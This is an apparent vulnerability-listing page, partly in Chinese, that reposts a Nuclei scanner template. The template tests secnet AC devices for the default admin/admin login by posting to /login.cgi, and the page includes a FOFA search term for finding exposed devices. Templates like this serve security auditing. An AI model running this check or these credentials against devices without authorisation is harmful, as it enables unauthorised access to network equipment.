secnet-ac-default-password: secnet ac - Default Admin Login

日期: 2025-08-01 | 影响软件: secnet ac | POC: 已公开

漏洞描述

secnet ac default admin credentials were successful. fofa: secnet

PoC代码[已公开]

id: secnet-ac-default-password

info:
  name: secnet ac - Default Admin Login
  author: ritikchaddha
  severity: high
  description: secnet ac default admin credentials were successful.
  reference:
    - https://bbs.secnet.cn/post/t-30
  metadata:
    max-request: 1
  tags: default-login,secnet,vuln

http:
  - raw:
      - |
        POST /login.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&password={{password}}

    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - admin

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "window.open('index.htm"

      - type: word
        part: header
        words:
          - "ac_userid={{username}},ac_passwd="

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f92b241502c844d5b0b44d7c547d2faf3cc8fa2018236f96bbff70492e5d6a1a0220698f670afd53f6840f8d940222a6c52ef5c61885a5d6c68ee81640c987a2e820:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/others/secnet-ac-default-login.yaml

相关漏洞推荐